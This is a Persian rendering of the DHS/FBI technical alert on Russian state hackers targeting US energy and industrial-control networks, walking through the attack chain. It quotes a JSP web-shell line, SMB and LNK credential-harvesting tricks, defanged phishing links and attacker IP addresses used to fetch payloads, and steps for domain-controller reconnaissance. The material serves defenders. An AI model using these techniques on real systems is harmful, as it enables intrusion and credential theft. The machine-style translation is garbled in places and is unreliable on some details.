مقدمه

هشدار فنی مشترک (TA) نتیجه تلاش‌های تحلیلی بین وزارت امنیت داخلی و اداره تحقیقات فدرال است. این هشدار اطلاعاتی را درباره اقدامات دولت روسیه در جهت هدف قرار دادن نهادهای دولتی ایالات متحده و همچنین سازمان‌های انرژی، هسته ای، تاسیسات تجاری، آب، هوایی و بخش‌های تولید بحرانی ارائه می‌دهد. همچنین شامل شاخص‌های سازش (IOCs) و جزئیات فنی در مورد تاکتیک ها، تکنیک ها و رویه ها (TTP ها) است که توسط نیرو‌های سایبری دولت روسیه در شبکه‌های قربانیان آسیب دیده استفاده می‌شود. DHS و FBI این هشدار را برای آموزش مدافعان شبکه به منظور افزایش توانایی آنها برای شناسایی و کاهش قرار گرفتن در معرض فعالیت‌های مخرب ایجاد کردند.

DHS و FBI این فعالیت را به عنوان یک برنامه نفوذ چند مرحله ای توسط نیرو‌های سایبری دولتی روسیه که شبکه‌های کنترل صنعتی را هدف قرار داده اند و بوسیله قرار دادن تروجان، حمله فیشینگ را اجرا کردند و دسترسی از راه دور به شبکه‌های بخش انرژی را به دست آوردند. پس از به دست آوردن دسترسی، نیرو‌های سایبر دولتی روسیه شبکه‌های سایبری و صنعتی را پویش نموده و اطلاعات لازم را جمع آوری کردند. در ادامه مسیر را برای گسترش سطح دسترسی هموار نموده و این عمل را در شبکه‌های ICS انجام دادند.

شرح

حداقل از سال 2016 تاکنون ، نیرو‌های سایبری دولت روسیه، بعدها به عنوان "نیرو‌های امنیت سایبری دولتی" شناخته می‌شدند موسسات دولتی و چندین زیربنای زیربناهای مهم ایالات متحده از جمله انرژی، تاسیسات هسته ای، تجاری، آب، هواپیما و بخش‌های مهم تولید را هدف قرار داده‌اند. تجزیه و تحلیل توسط DHS و FBI، منجر به شناسایی شاخص‌های مشخص و رفتار مربوط به این فعالیت است. توجه داشته باشید، گزارش Dragonfly: بخش انرژی غربی توسط گروه حمله پیچیده که توسط سیمانتک در تاریخ 6 سپتامبر 2017 منتشر شد، اطلاعات بیشتری در مورد این کمپین مداوم ارائه می‌دهد. این مبارزات شامل دو دسته مجزا از قربانیان است: شناسایی اهداف جدید، حمله به اهداف تعیین شده. قربانیان اولیه سازمان‌های محرمانه‌ای مانند تامین کنندگان ثالث قابل اعتماد با شبکه‌های امن‌تر هستند که در این هشدار به عنوان "اهداف تعیین شده" اشاره شده است. نیرو‌های امنیت سایبری دولتی استفاده از شبکه‌های اهداف تعیین شده را به عنوان نقاط محوری هنگام هدف گیری قربانیان نهایی خود قرار داده اند. NCCIC و FBI با توجه به رفتار آنها اینطور تحلیل می‌کنند که هدف نهایی نیرو‌های این است که به شبکه‌های سازمانی آسیب برسانند، همچنین به عنوان "هدف مورد نظر" اشاره شده است.

جزییات فنی

نیرو‌های امنیت سایبری دولتی تهدید کننده در این کمپین انواع مختلفی از TTP (تاکنیک، تکنیک و روش‌ها)را پیاده‌سازی می‌نمودند:

• ایمیل‌های فیشینگ (با استفاده اهداف معتبر که دسترسی در آنها وجو دارد)
• حملات بر دامنه‌های آسیب‌پذیر و مربوط به حوزه سیستم‌های کنترل صنعتی
• جمع آوری مدارک و اطلاعات برای حملات بعدی و هدفمند‌تر کردن حملات
• شناسایی شبکه برای گسترش سطح دسترسی
• نوشتن قطعه کد مخرب مبتنی بر میزبان‌های صنعتی مانند HMI ها و Eng/Work
• هدف قرار دادن زیرساخت‌های کنترل صنعتی (ICS).

استفاده از زنجیره حمله‌های سایبری برای تجزیه و تحلیل

مجموعه ICSdefender برای تحلیل رفتار این حملات از مدل زنجیره حملاتی که توسط Lockheed-Martin طراحی شده، استفاده می‌کند. فازهای این مدل شامل شناسایی، مسلح کردن، تحویل، بهره برداری، نصب، فرمان و کنترل و اقدامات مربوط به هدف است.

مرحله یک: شناسایی

به نظر می‌رسد نیرو‌های امنیت سایبری دولتی به طور آگاهانه سازمان‌هایی را که مورد هدف قرار می‌گیرند انتخاب کرده اند. اهداف مرحله بندی روابط پیشین را با بسیاری از اهداف مورد نظر برقرار کرد. مجموعه ICSdefender بر این باور است که تجزیه و تحلیل و شناسایی نیرو‌های امنیت سایبری دولتی دسترسی به اطلاعات عمومی‌در دسترس میزبانی شده توسط شبکه‌های تحت نظارت سازمان در طول مرحله شناسایی حتما انجام شده و می‌توان گفت با این حرکت اولین مرحله از مدل زنجیره حملات را پیاده‌سازی نموده‌اند. و البته آنها با استفاده از این شناسایی به دنبال اطلاعات و قابلیت‌های مربوط به شبکه و زیرساخت سیستم‌های کنترل صنعتی سازمان‌‌های مورد هدف می‌باشند. این تاکتیک ها معمولا برای جمع آوری اطلاعات مورد نیاز برای حملات هدفمند فیشینگ استفاده می‌شود. در برخی موارد، اطلاعات ارسال شده به وب سایت‌های شرکت، به ویژه اطلاعاتی که ممکن است به نظر بی خطر باشند، ممکن است حاوی اطلاعات عملیاتی حساس باشد. به عنوان مثال، نیرو‌های امنیت سایبری دولتی یک عکس کوچک از یک صفحه منابع انسانی قابل دسترسی را دریافت کردند. تصویر، مورد نظر با اعمال تغییرات در کیفیت و کمیت، یک عکس با وضوح بالا بود که مدل‌های تجهیزات کنترل سیستم ها و اطلاعات وضعیت در پس زمینه را نشان داده است.

مرحله دو: مسلح کردن

ایمیل TTP‌های ایمیل فیشینگ

طبق تحلیل ICSdefender با توجه به بررسی‌های انجام شده، در فاصله زمانی حملات فیشینگ، نیرو‌های امنیت سایبری دولتی از ضمیمه‌های ایمیل برای استفاده از توابع مشروع مایکروسافت آفیس برای بازیابی یک سند از یک سرور از راه دور با استفاده از پروتکل پیام سرور بلوک (SMB) استفاده کردند. (یک مثال از این درخواست است: فایل [::] // <آدرس IP راه دور> /Normal.dotm). به عنوان بخشی از فرایندهای استاندارد انجام شده توسط Microsoft Word، این درخواست مشتری را با سرور تایید می‌کند، هشدار اعتبار کاربر را به سرور راه دور قبل از بازیابی فایل درخواست شده ارسال می‌کند. (توجه داشته باشید: انتقال اعتبارات ممکن است، حتی اگر فایل بازیابی نگردد.) پس از به دست آوردن هش اعتبار، نیرو‌های امنیت سایبری دولتی می‌توانند از تکنیک‌های رمز گشایی رمز عبور برای به دست آوردن رمز عبور استفاده کنند. با داشتن این رابطه معتبر، نیرو‌های امنیت سایبری دولتی می‌توانند به عنوان کاربران مجاز در محیط‌هایی که از احراز هویت تک فاکتور استفاده می‌کنند، پنهان شوند.

استفاده از Watering Hole Domains

یکی از تهدیدات اصلی نیرو‌های برای رسیدن به اهداف، توسعه watering holes بود. نیرو‌های امنیت سایبری دولتی، زیرساخت‌های سازمان‌های مورد اعتماد را برای دستیابی به اهداف مورد نظر به خطر می‌اندازند. [3] تقریبا نیمی‌از watering holes‌های شناخته شده، نشریات تجاری و وب سایت‌های اطلاعاتی مرتبط با کنترل فرایند، ICS یا زیرساخت‌های حیاتی هستند. اگر چه این watering holes ها ممکن است محتوی قانونی ایجاد شده توسط سازمان‌های معتبر را نمایش دهند، اما نیرو‌های امنیت سایبری دولتی تغییرات لازم را در وب سایت ها مدنظر برای انتشار محتوای مخرب ایجاد نموده‌اند. نیرو‌های امنیت سایبری دولتی از اعتبارنامه‌های قانونی برای دسترسی به محتوای وب سایت و تغییر آن به طور مستقیم استفاده می‌کنند. نیرو‌های امنیت سایبری دولتی این وب سایت ها را با تغییر دادن فایل‌های جاوا اسکریپت و پی اچ پی برای درخواست یک نماد فایل با استفاده از SMB از یک آدرس IP تحت کنترل نیرو‌های امنیت سایبری دولتی اصلاح کردند. این درخواست یک تکنیک مشابهی را که در اسناد اسکریپت فیشینگ برای برداشت اعتبار انجام می‌دهد. در یک نمونه، نیرو‌های امنیت سایبری دولتی یک خط کد را در فایل "header.php"، یک فایل پی اچ پی قانونی که ترافیک هدایت شده را انجام داد، اضافه کرد.

در مثال دیگری، نیرو‌های امنیت سایبری دولتی، فایل جاوا اسکریپت "modernizr.js"، یک کتابخانه ی جاوا اسکریپت قانونی مورد استفاده در وب سایت را برای شناسایی جنبه‌های مختلف مرورگر کاربر مورد نظر، تغییر دادند. در واقع پرونده برای مطالبی که از اینجا می‌توانید دانلود کنید،  اصلاح شد:

مرحله سه: تحویل

نیرو‌های امنیت سایبری دولتی برای حمله به شبکه‌ مورد نظر از ایمیل‌های فیشینگ استفاده می‌کنند که از TTP‌های قبلا گزارش شده متفاوت است. ایمیل‌های قطعی فیسبوک از یک موضوع قرارداد عمومی‌(با موضوع "موافقتنامه و محرمانه") استفاده کرده و حاوی یک اسناد PDF عمومی‌با عنوان "document.pdf" است. (توجه داشته باشید که در ابتدای نام دلخواه دو عدد پشتی قرار داده می‌شود.) PDF ناقص بود و هیچ کد فعال نبود. این سند شامل یک URL کوتاه شده بود که وقتی روی آن کلیک کرد، کاربران را به یک وب سایت هدایت کرد که کاربر را برای آدرس ایمیل و رمز عبور راهنمایی کرد. (توجه: کد موجود در PDF یک دانلود را آغاز نمیکند.)

در گزارش قبلی، DHS و FBI اشاره کردند که تمام این ایمیل‌های فیسبوک صریح به سیستم‌های کنترل یا سیستم‌های کنترل فرآیند اشاره دارند. نیرو‌های امنیت سایبری دولتی با استفاده از این تم ها به طور خاص به سازمان‌های هدف مورد نظر ادامه دادند. پیام‌های ایمیل حاوی مراجع به تجهیزات و پروتکل‌های صنعتی کنترل صنعتی بود. این ایمیل ها از فایلهای مخرب مایکروسافت ورد استفاده می‌کنند که به نظر می‌رسد رزومه‌های قانونی یا CV ها (CVs) برای پرسنل سیستم‌های کنترل صنعتی و دعوت نامه ها و اسناد سیاست ای است که کاربر را مجبور به باز کردن پیوست می‌کند.

مرحله چهار: بهره‌برداری

نیرو‌های امنیت سایبری دولتی از TTP متمایز و غیر معمول استفاده می‌کنند (به عنوان مثال، هدایت‌های متوالی) بطوری که با استفاده از تکنیک فیشینگ و تاکتیک هدایت‌های متوالی تغییرات مورد نظر را در هدف اعمال می‌کنند. ایمیل ها شامل یک پیوند کوتاه شده URL که کاربر را به لینک http: // bit [.] ly / 2m0x8IH هدایت کرده، و در ادامه آن را به لینک http: // tinyurl [.] com / h3sdqck هدایت می‌کند، و در نهایت کاربر را به سمت مقصد نهایی http: // imageliners [.] com / nitel هدایت می‌کند. وب سایت imageliner [.] com حاوی یک آدرس ایمیل و زمینه ورودی رمز عبور است که یک صفحه ورود به سایت را برای یک وب سایت شبیه سازی می‌کند.

هنگام استفاده قطعه کد مخرب به منظور بهره‌برداری از اهداف قبلا تعیین شده، نیرو‌های امنیت سایبری دولتی از فایلهای مخرب docx برای تصویربرداری از مجوزهای کاربری استفاده کردند. فایل‌های محتوای اسناد تلاش می‌کنند فایل را با اتصال "file: \\" از طریق SMB با استفاده از پورت 445 یا 139 پروتکل (TCP) و پورت 137 یا 138 پروتکل (UDP) بازیابی کنند. این اتصال به یک فرمان و کنترل (C2) سرور - یا یک سرور متعلق به نیرو‌های امنیت سایبری دولتی و یا یک سیستم دسترسی گرفته شده متعلق به یک قربانی متصل خواهد شد. هنگامی‌که یک کاربر به عنوان یک کاربر دامنه تأیید می‌شود، این سرور C2 با Hash قربانی را ارائه می‌دهد. کاربران محلی یک واسط کاربری گرافیکی (GUI) را برای وارد کردن نام کاربری و رمز عبور دریافت خواهند کرد. (توجه داشته باشید: انتقال فایل برای از بین بردن اطلاعات اعتبار ضروری نیست.) گزارش سیمانتک این رفتار را به نیرو‌های امنیت سایبری دولتی در حملاتDragonfly مرتبط می‌داند.

مرحله پنجم: نصب

نیرو‌های امنیت سایبری دولتی از اعتبار نامه‌های آسیب پذیر برای دسترسی به شبکه‌های قربانیان که در آن احراز هویت چند عامل وجود ندارد، مورد استفاده قرار می‌دهند و همچنین برای حفظ ماندگاری، نیرو‌های امنیت سایبری دولتی حساب‌های محلی را در حوضه‌های تعیین شده ایجاد کردند و فایل‌های مخرب را در اهداف مورد نظر قرار دادند.

ایجاد حساب‌های محلی

نیرو‌های امنیت سایبری دولتی از اسکریپت ها برای ایجاد حساب‌های سرپرست محلی را که به عنوان حساب‌های پشتیبان قانونی مبدل شده اند استفاده می‌کنند. در واقع اسکریپت اولیه "symantec_help.jsp" حاوی رهنمود یک خط برای یک اسکریپت مخرب طراحی شده برای ایجاد حساب کاربری محلی و مدیریت فایروال برای دسترسی از راه دور است. این اسکریپت در "C: \ Program Files (x86) \ Symantec \ Symantec Endpoint Protection Manager \ tomcat \ webapps \ ROOT \" قرار گرفته است.

محتویات symantec_help.jsp را از اینجا می‌توانید دانلود کنید.

<% Runtime.getRuntime().exec(‎"cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\\""); %>

اسکریپت "enu.cmd" یک حساب کاربری ایجاد کرده، فایروال مبتنی بر میزبان را غیرفعال کرده است، و پورت 3389 را برای دسترسی به پروتکل دسک تاپ (RDP) باز کرده است. این اسکریپت پس از آن تلاش کرد که حساب جدید ایجاد شده را به گروه مدیران اضافه کند تا امتیازات بالاتری به دست آورد. این اسکریپت دارای مقادیر سخت افزاری برای نام گروه "administrator" در اسپانیایی، ایتالیایی، آلمانی، فرانسوی و انگلیسی است.

محتویات end.cmd را از اینجا می‌توانید دانلود کنید.

نیرو‌های امنیت سایبری دولتی با استفاده از این اسکریپت و اسکریپت‌های مشابه برای ایجاد چندین حساب در شبکه‌های هدف استفاده می‌کردند. هر حساب ایجاد شده توسط نیرو‌های امنیت سایبری دولتی به هدف خاصی در عملیات خود خدمت کرده است. این اهداف از ایجاد حساب‌های اضافی تا پاکسازی فعالیت ها متغیر بود. با توجه به بررسی‌های انجام شده، نیرو‌های امنیت سایبری دولتی اقدامات زیر را بعد از ایجاد این حساب‌های محلی انجام دادند:

• حساب 1: حساب 1 به منظور تقلید خدمات تهیه پشتیبان از هدف تعیین شده نامگذاری شد. این حساب توسط اسکریپت مخرب که قبلا توضیح داده شد ایجاد شده است. هکر دولتی با استفاده از این حساب برای انجام شناسایی منبع باز و دسترسی از راه دور به اهداف مورد نظر.
• حساب 2: حساب 1 برای ایجاد حساب کاربری 2 برای جعل هویت حساب کاربری ایمیل استفاده شد. تنها اقدام مشاهده شده ایجاد حساب 3 بود.
• حساب 3: حساب 3 در سرور مایکروسافت قربانی ارائه شده است. یک اسکریپت PowerShell این حساب را در یک جلسه RDP ایجاد کرد در حالی که عامل تهدید به عنوان حساب 2 تأیید شد. قراردادهای نامگذاری حساب مایکروسافت مایکروسافت ایجاد شده به دنبال آن از هدف استقرار (به عنوان مثال، ابتدا با نام اصلی پیوند داده شد).
• حساب 4: در مرحله دوم مصالحه، شخص تهدید با استفاده از حساب 1 برای ایجاد حساب 4، یک حساب کاربری محلی. سپس حساب 4 برای پاک کردن سیاهههای مربوط و حذف آهنگها استفاده شد.

فعالیت‌‌های برنامه ریزی شده

علاوه بر این، نیرو‌های امنیت سایبری دولتی یک کار برنامه ریزی شده با نام reset ایجاد کردند که برای هر بار هشت ساعت به طور خودکار از حساب کاربری تازه ایجاد شده خود خارج شد.

نرم افزار VPN

پس از دستیابی به اهداف تعیین شده، نیرو‌های امنیت سایبری دولتی ابزارهایی را برای انجام عملیات علیه قربانیان منتخب نصب کردند. در یک مورد، نیرو‌های امنیت سایبری دولتی نسخه رایگان FortiClient را نصب کردند، که احتمالا به عنوان یک مشتری VPN برای اتصال به شبکه‌های هدف مورد استفاده قرار می‌گیرند.

دانلودر

هنگامی‌که در داخل یک شبکه هدف مورد نظر قرار گرفت، تهدید کننده اقدام به دانلود ابزار از یک سرور از راه دور کرد. نسخه‌های اولیه نام فایل شامل افزونه‌های .txt بود و به پسوند مناسب، معمولا .exe یا .zip تغییر نام یافت. در یک مثال، پس از دستیابی به دسترسی از راه دور به شبکه قربانی مورد نظر، شخص تهدید اقدامات زیر را انجام داد:

• هکر دولتی به 91.183.104 [.] 150 متصل شده است و فایل‌های چندگانه، بخصوص فایل INST.txt را دانلود کرده است.
• فایل ها به پسوند‌های جدید تغییر نام یافتند، INST.txt که به INST.exe تغییر نام یافت.
• فایل ها بر روی میزبان اجرا شد و سپس بلافاصله حذف شدند.
• اجرای INST.exe باعث دانلود ntdll.exe شد، و کمی‌بعد، ntdll.exe در لیست فرایندهای در حال اجرا سیستم به خطر افتاده از یک هدف مورد نظر ظاهر شد.
• مقدار رجیستری "ntdll" به کلید "HKEY_USERS \ \ Software \ Microsoft \ Windows \ CurrentVersion \ Run" اضافه شد.

دستکاری مستمر از طریق فایل .LNK

نیرو‌های امنیت سایبری دولتی شده فایلهای LNK را، که معمولا به عنوان یک فایل میانبر مایکروسافت شناخته می‌شوند، دستکاری می‌کنند تا بارها جمع آوری اعتبار کاربر را انجام دهند. قابلیت پیش فرض ویندوز آیکون ها را می‌توان از یک مخزن ویندوز محلی یا راه دور بارگیری کرد. نیرو‌های امنیت سایبری دولتی با استفاده از این قابلیت ساخته شده در ویندوز با تنظیم مسیر آیکون به کنترلر سرور راه دور توسط نیرو‌های. هنگامی‌که کاربر به دایرکتوری می‌رود، ویندوز تلاش می‌کند تا آیکون را بارگذاری و یک جلسه تأیید هویت SMB را آغاز کند. در طول این فرآیند، اعتبار فعال کاربر از طریق اتصال SMB انجام می‌شود.

چهار فایل LNK مشاهده شده "SETROUTE.lnk"، "notepad.exe.lnk"، "Document.lnk" و "desktop.ini.lnk" بودند. این نام‌ها به نظر میرسد متنی هستند و هکر دولتی می‌تواند از چندین نام فایل دیگر در هنگام استفاده از این تاکتیک استفاده کند. دو سرور از راه دور در مسیر آیکون این پرونده‌های LNK مشاهده شد: 62.8.193 [.] 206 و 5.153.58 [.] 45. در زیر محتوای تجزیه شده یکی از فایلهای LNK را مشاهده می‌کنید:

مرحله شش: فرماندهی و کنترل

نیرو‌های امنیت سایبری دولتی به طور معمول پوسته‌های وب را بر روی اهداف مورد نظر 'ایمیل ها و سرورهای وب قابل دسترسی در دسترس قرار می‌دهند. نیرو‌های امنیت سایبری دولتی از دو نام مختلف فایل ("global.aspx"، "autodiscover.aspx" و "index.aspx") برای دو Webshell مختلف استفاده می‌کنند. تفاوت بین دو گروه "میدان رمز عبور عمومی" بود. محتوای این بخش نیز در سند PDF قابل مشاهده می‌باشد.

مرحله هفتم: اقدامات در اهداف

FBI نیرو‌های امنیت سایبری دولتی را بواسطه استفاده از خدمات دسترسی از راه دور و زیرساخت‌های مانند VPN، RDP و Outlook Web Access (OWA) شناسایی کردند. نیرو‌های امنیت سایبری دولتی از زیرساخت هدف، برای اتصال به چند هدف دیگر مورد استفاده می‌کنند.

شناسایی داخلی

پس از دسترسی به قربانیان مورد نظر، نیرو‌های امنیت سایبری دولتی عملیات شناسایی را در داخل شبکه انجام دادند. هنگامی‌که در شبکه هدف مورد نظر قرار می‌گیرد، نیرو‌های امنیت سایبری دولتی از اعتبار دسترسی‌های ویژه برای دسترسی به کنترل کننده دامنه قربانی به طور معمول از طریق RDP استفاده می‌کنند. هنگامی‌که در کنترل کننده دامنه بود، نیرو‌های امنیت سایبری دولتی از اسکریپت‌های دسته ای "dc.bat" و "dit.bat" برای شمارش میزبان، کاربران و اطلاعات اضافی در مورد محیط استفاده کردند. خروجی‌های مشاهده شده (اسناد متنی) از این اسکریپتها عبارت بودند از:

• admins.txt
• completed_dclist.txt
• completed_trusts.txt
• completed_zone.txt
• comps.txt
• conditional_forwarders.txt
• domain_zone.txt
• enum_zones.txt
• users.txt

امنیت سایبری دولتی همچنین فایل‌های "ntds.dit" و "SYSTEM" را ثبت کردند. همچنین طی بررسی‌های انجام شده مشخص شد، امنیت سایبری دولتی تمام این فایل‌های مذکور را به فایل با نام "SYSTEM.zip" و "comps.zip" فشرده کرده‌اند. امنیت سایبری دولتی از وظایف برنامه ریزی شده ویندوز و اسکریپت‌های دسته ای برای اجرای "scr.exe" استفاده کرده و اطلاعات اضافی را از میزبان ها در شبکه جمع آوری می‌کنند. ابزار "scr.exe" یک ابزار تصویری است که شخص تهدید برای تصویر برداری از سیستم در سراسر شبکه استفاده می‌کند. در حداقل دو مورد، امنیت سایبری دولتی استفاده از اسکریپت‌های دسته ای با برچسب pss.bat و psc.bat را برای اجرای ابزار Psexec‎ استفاده می‌کنند. علاوه بر این، امنیت سایبری دولتی می‌توانند Psexec‎ ابزار را به "ps.exe" تغییر نام دهند.

1. اسکریپت دسته ای ("pss.bat" یا "psc.bat") با مجوز سرپرست دامنه اجرا می‌شود.
2. شاخه "خارج" در پوشه٪ AppData٪ کاربر ایجاد می‌شود.
3. Psexec‎ برای اجرای "scr.exe" در سراسر شبکه و برای جمع آوری تصاویری از سیستم ها در "ip.txt" استفاده می‌شود.
4. نام فایل تصویری براساس نام رایانه میزبان و در C: \ Windows \ Temp هدف با پسوند «.jpg» ذخیره شده است.
5. این تصویر پس از آن به دایرکتوری جدید "خارج" سیستم که در آن اسکریپت دسته ای اجرا شد، کپی می‌شود.
6. در یک مورد، DHS فایل ex.zip را ایجاد کرد.

طی بررسی‌های انجام شده مشخص شد نیرو‌های امنیت سایبری دولتی یک سند متن با برچسب "ip.txt" که معتقد است حاوی یک لیست از اطلاعات میزبان است ایجاد و اصلاح کرده‌اند. نیرو‌های امنیت سایبری دولتی "ip.txt" را به عنوان منبع میزبان برای انجام اقدامات شناسایی بیشتر مورد استفاده قرار دادند. علاوه بر این، اسناد متنی "res.txt" و "err.txt" مشاهده شده در نتیجه اسکریپت‌های دسته ای که اجرا می‌شوند ایجاد می‌شوند. در یک نمونه، "res.txt" حاوی خروجی از فرمان ویندوز "کاربر پرس و جو" در سراسر شبکه بود.

Using

Running -s cmd /c query user on

Running -s cmd /c query user on

Running -s cmd /c query user on

USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME

2 Disc 1+19:34 6/27/2017 12:35 PM

یک اسکریپت با نام "dirsb.bat" برای جمع آوری نام پوشه ها و فایل ها از میزبان ها در شبکه استفاده شد.

علاوه بر اسکریپت‌های مذکور، نیرو‌های امنیت سایبری دولتی همچنین از وظایف برنامه ریزی شده برای جمع آوری تصاویر با "scr.exe" استفاده می‌کنند. در دو مورد، وظایف برنامه ریزی شده برای اجرای دستور "C: \ Windows \ Temp \ scr.exe" با استدلال "C: \ Windows \ Temp \ scr.jpg" طراحی شده بود. در مثال دیگری، کار برنامه ریزی شده برای اجرا با استدلال "pss.bat" از پوشه محلی Administrator محلی "AppData \ Local \ Microsoft \" طراحی شده است. نیرو‌های امنیت سایبری دولتی معمولا از فایل‌های دایرکتوری‌های مختلف در پوشه AppData یا Downloads استفاده می‌کنند. برخی از نام‌های دایرکتوری مشترک در داخل سند قابل مشاهده هستند. لطفا آن را از اینجا دانلود کنید.

هدف قرار دادن زیرساخت‌های ICS و SCADA

در موارد متعدد، نیرو‌های امنیت سایبری دولتی به ایستگاه‌های کاری و سرورها در یک شبکه شرکتی دسترسی پیدا کردند که خروجی داده ها را از سیستم‌های کنترل درون بخش صنعتی و انرژی تولید می‌کرد. نیرو‌های امنیت سایبری دولتی به فایل‌های مربوط به ICS یا کنترل‌های نظارت و جمع آوری داده ها (SCADA) دسترسی پیدا می‌کنند. بر اساس تجزیه و تحلیل ما از روش‌های موجود، این پرونده ها با نام‌های فروشنده ICS و اسناد مرجع ICS مربوط به سازمان نامگذاری شده‌اند (به عنوان مثال، "SCADA CIRING DIAGRAM.pdf" یا "SCADA PANEL LAYOUTS.xlsx").

امضای شبکه و قوانین مبتنی بر میزبان

این بخش شامل امضاهای شبکه و قوانین مبتنی بر میزبان است که می‌تواند مورد استفاده برای شناسایی فعالیت‌های مخرب مرتبط با TTP‌های تهدید کننده عمل کند. اگر چه این امضا‌های شبکه و قوانین مبتنی بر میزبان با استفاده از یک فرایند جامع ارزیابی ایجاد شد، احتمال وجود مثبت کاذب همیشه باقی می‌ماند.

امضا‌های شبکه

این بخش نیز در سندی که لینک دانلود آن در انتهای این صفحه درج شده، موجود است.

قوانین YARA

این یک قانون تلفیقی برای بدافزارهای مرتبط با این فعالیت است. این قوانین توسط NCCIC نوشته شده که در سند PDF قابل مشاهده است.

مطلب فوق و قطعه کدهای مورد نظر را می‌توانید از اینجا دانلود کنید.